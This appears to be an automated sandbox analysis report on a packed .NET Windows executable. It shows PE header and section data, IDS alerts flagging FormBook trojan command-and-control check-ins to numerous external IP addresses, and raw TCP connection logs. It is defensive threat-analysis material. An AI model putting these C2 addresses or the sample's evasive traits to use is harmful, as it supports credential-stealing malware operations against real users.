                                                                                  Entrypoint:0x4aa36e
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x9354E9B9 [Wed Apr 29 23:26:49 2048 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaa31b | 0x4f | .text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x5b4 | .rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xae000 | 0xc | .reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa94cc | 0x70 | .text
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                  .text | 0x2000 | 0xa8374 | 0xa8400 | 63337886eae68a78e3af583e05ffbb64 | False | 0.9855866340081724 | data | 7.989685826785 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc | 0xac000 | 0x5b4 | 0x600 | 7ffcc5396b09c0c60d26fd901607bf86 | False | 0.423828125 | data | 4.11844720397453 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc | 0xae000 | 0xc | 0x200 | c93b3f8847a46ae974e8b907940fd78a | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                  RT_VERSION | 0xac090 | 0x324 | data | | | 0.43159203980099503
                                                                                  RT_MANIFEST | 0xac3c4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                                                  DLL | Import
                                                                                  mscoree.dll | _CorExeMain
                                                                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                  03/18/24-14:49:23.116360 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49764 | 80 | 192.168.2.10 | 89.31.143.90
                                                                                  03/18/24-14:47:24.864581 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49734 | 80 | 192.168.2.10 | 49.0.230.183
                                                                                  03/18/24-14:47:45.037863 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49740 | 80 | 192.168.2.10 | 66.29.152.141
                                                                                  03/18/24-14:49:15.008940 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49761 | 80 | 192.168.2.10 | 89.31.143.90
                                                                                  03/18/24-14:49:00.929117 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49757 | 80 | 192.168.2.10 | 103.197.25.241
                                                                                  03/18/24-14:47:36.204871 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.10 | 66.29.152.141
                                                                                  03/18/24-14:46:47.390741 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49724 | 80 | 192.168.2.10 | 144.76.75.181
                                                                                  03/18/24-14:48:41.640265 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49756 | 80 | 192.168.2.10 | 50.6.160.34
                                                                                  03/18/24-14:46:38.541470 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.10 | 144.76.75.181
                                                                                  03/18/24-14:48:07.754865 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.10 | 87.236.19.107
                                                                                  03/18/24-14:48:22.873091 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.10 | 154.7.21.55
                                                                                  03/18/24-14:47:15.585177 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49732 | 80 | 192.168.2.10 | 104.21.63.135
                                                                                  03/18/24-14:46:41.234545 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49722 | 80 | 192.168.2.10 | 144.76.75.181
                                                                                  03/18/24-14:47:30.526801 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49736 | 80 | 192.168.2.10 | 49.0.230.183
                                                                                  03/18/24-14:48:36.357367 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49754 | 80 | 192.168.2.10 | 50.6.160.34
                                                                                  03/18/24-14:47:22.032780 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49733 | 80 | 192.168.2.10 | 49.0.230.183
                                                                                  03/18/24-14:47:53.290655 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49742 | 80 | 192.168.2.10 | 192.64.119.184
                                                                                  03/18/24-14:46:06.415073 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49715 | 80 | 192.168.2.10 | 149.88.64.51
                                                                                  03/18/24-14:46:26.987706 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49717 | 80 | 192.168.2.10 | 47.76.88.64
                                                                                  03/18/24-14:48:28.230214 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49752 | 80 | 192.168.2.10 | 154.7.21.55
                                                                                  03/18/24-14:49:17.708078 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49762 | 80 | 192.168.2.10 | 89.31.143.90
                                                                                  03/18/24-14:47:39.612848 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49738 | 80 | 192.168.2.10 | 66.29.152.141
                                                                                  03/18/24-14:48:14.519924 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49748 | 80 | 192.168.2.10 | 87.236.19.107
                                                                                  03/18/24-14:48:05.006691 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49745 | 80 | 192.168.2.10 | 87.236.19.107
                                                                                  03/18/24-14:47:59.248907 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49744 | 80 | 192.168.2.10 | 192.64.119.184
                                                                                  03/18/24-14:48:20.193872 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49749 | 80 | 192.168.2.10 | 154.7.21.55
                                                                                  03/18/24-14:46:52.992602 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49725 | 80 | 192.168.2.10 | 64.190.62.22
                                                                                  03/18/24-14:46:32.650841 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49719 | 80 | 192.168.2.10 | 47.76.88.64
                                                                                  03/18/24-14:47:02.369576 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49728 | 80 | 192.168.2.10 | 64.190.62.22
                                                                                  03/18/24-14:46:23.153101 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49716 | 80 | 192.168.2.10 | 47.76.88.64
                                                                                  03/18/24-14:49:03.754472 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49758 | 80 | 192.168.2.10 | 103.197.25.241
                                                                                  03/18/24-14:46:55.688066 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49726 | 80 | 192.168.2.10 | 64.190.62.22
                                                                                  03/18/24-14:47:07.758224 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49729 | 80 | 192.168.2.10 | 104.21.63.135
                                                                                  03/18/24-14:49:09.406211 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49760 | 80 | 192.168.2.10 | 103.197.25.241
                                                                                  03/18/24-14:47:50.648512 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49741 | 80 | 192.168.2.10 | 192.64.119.184
                                                                                  03/18/24-14:48:33.723190 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49753 | 80 | 192.168.2.10 | 50.6.160.34
                                                                                  03/18/24-14:47:10.366529 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49730 | 80 | 192.168.2.10 | 104.21.63.135
                                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Mar 18, 2024 14:46:38.366398096 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:38.541013956 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.541178942 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:38.541470051 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:38.715842009 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.716084957 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.716103077 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.716151953 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.716192007 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:38.716227055 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:40.043420076 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.059415102 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.234124899 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.234221935 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.234544992 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.409164906 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.409279108 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.409295082 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.409377098 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.409421921 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.409421921 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:42.902200937 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.511080980 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.685820103 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.686052084 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.686347008 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.860836029 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.860862017 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.860944986 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.860970020 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.861032963 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.861043930 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.861108065 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.861123085 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:45.035608053 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:45.035626888 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.215873957 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.390405893 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.390496016 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.390741110 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.565274000 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.565624952 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.565648079 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.565661907 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.565768957 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.565931082 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.740379095 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:52.816927910 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:52.992162943 CET804972564.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:52.992330074 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:52.992602110 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:53.167927027 CET804972564.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:53.167957067 CET804972564.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:53.168253899 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:54.496640921 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:55.512938023 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:55.687660933 CET804972664.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:55.687812090 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:55.688066006 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:55.863796949 CET804972664.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:55.863828897 CET804972664.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:55.863878012 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:57.199665070 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:58.215837955 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:58.391607046 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.391702890 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:58.392365932 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:58.567924023 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.567974091 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.568355083 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.568489075 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.568567038 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:59.902806044 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:00.919106960 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:01.093946934 CET804972864.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:47:01.094109058 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:02.369575977 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:02.545206070 CET804972864.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:47:02.545244932 CET804972864.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:47:02.545388937 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:02.546802044 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:02.721425056 CET804972864.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:47:07.669711113 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:07.757265091 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:07.757472992 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:07.758224010 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:07.845474958 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.005417109 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.005518913 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.005764961 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.007513046 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.007729053 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.007860899 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.007893085 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.007936954 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008006096 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.008039951 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008121014 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008157015 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008188009 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.008193016 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008208990 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008251905 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.008318901 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:09.262387991 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.278243065 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.366116047 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.366276979 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.366528988 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.454380989 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623780966 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623802900 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623815060 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623830080 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623891115 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.623894930 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623908043 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623920918 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623935938 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623950958 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623963118 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623972893 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.623997927 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.624238014 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.624280930 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:11.871659040 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:12.889334917 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:12.978353024 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:12.978516102 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:12.978792906 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:13.067497969 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.067519903 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235183001 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235232115 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235313892 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235373974 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:13.235384941 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235466003 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235544920 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:13.235584021 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235630035 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235667944 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:13.235713005 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235786915 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:13.235819101 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235867977 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.235935926 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:13.236067057 CET8049731104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:13.236151934 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:14.480953932 CET4973180192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.497024059 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.584870100 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.584952116 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.585176945 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.672808886 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.840375900 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.840405941 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.840451002 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.840533972 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.840651035 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.840670109 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.840692043 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.840773106 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.840828896 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.840893030 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841022015 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841073036 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.841094017 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841145039 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841183901 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841186047 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.841228962 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841244936 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841279984 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.841324091 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841372013 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.841435909 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841492891 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841541052 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.841543913 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841624022 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841676950 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.841696978 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841744900 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:15.841792107 CET4973280192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:15.841854095 CET8049732104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:48:34.269690990 CET4975380192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:34.269727945 CET804975350.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:34.269742012 CET804975350.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:34.269785881 CET4975380192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:34.269819021 CET804975350.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:34.270035982 CET804975350.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:34.270086050 CET804975350.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:34.270087957 CET4975380192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:34.270148039 CET804975350.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:34.270200014 CET4975380192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:34.271770000 CET804975350.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:34.324656963 CET4975380192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:35.231086016 CET4975380192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.247037888 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.356986046 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.357076883 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.357367039 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.467477083 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771097898 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771156073 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771169901 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771238089 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771265030 CET4975480192.168.2.1050.6.160.34
                                                                                  Mar 18, 2024 14:48:36.771297932 CET804975450.6.160.34192.168.2.10
                                                                                  Mar 18, 2024 14:48:36.771317005 CET4975480192.168.2.1050.6.160.34
